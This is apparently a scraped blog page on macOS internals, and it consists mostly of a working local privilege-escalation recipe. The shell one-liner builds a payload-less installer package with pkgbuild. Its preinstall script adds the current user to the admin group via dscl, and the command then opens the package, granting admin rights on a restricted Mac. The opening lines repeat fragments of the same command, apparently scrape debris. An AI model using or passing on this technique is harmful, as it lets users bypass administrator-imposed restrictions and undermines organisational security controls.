/tmp/simple-package/scripts/preinstall && chmod +x /tmp/simple-package/scripts/preinstall && pkgbuild --identifier com.simple --nopayload --scripts /tmp/simple-package/scripts ~/Downloads/simple.pkg && open ~/Downloads/simple.pkg"> /tmp/simple-package/scripts/preinstall && chmod +x /tmp/simple-package/scripts/preinstall && pkgbuild --identifier com.simple --nopayload --scripts /tmp/simple-package/scripts ~/Downloads/simple.pkg && open ~/Downloads/simple.pkg"> /tmp/simple-package/scripts/preinstall && chmod +x /tmp/simple-package/scripts/preinstall && pkgbuild --identifier com.simple --nopayload --scripts /tmp/simple-package/scripts ~/Downloads/simple.pkg && open ~/Downloads/simple.pkg">
mkdir -p /tmp/simple-package/scripts &&
touch /tmp/simple-package/scripts/postinstall &&
echo -e \\#\\!\\/bin\\/bash "\\n" "dscl . -append /Groups/admin GroupMembership" `whoami` "\\n" "exit 0" > /tmp/simple-package/scripts/preinstall &&
chmod +x /tmp/simple-package/scripts/preinstall &&
pkgbuild --identifier com.simple --nopayload --scripts /tmp/simple-package/scripts ~/Downloads/simple.pkg &&
open ~/Downloads/simple.pkg
Root on a restricted mac that allows pkgbuild and dscl
I have amassed quite the stockpile of notes from my years of working in macOS and with macOS internals. There is a lot of information that I am attempting to collate into more-readable documents. Furthermore, sharing is caring, so I felt it was time to start putting these documents available online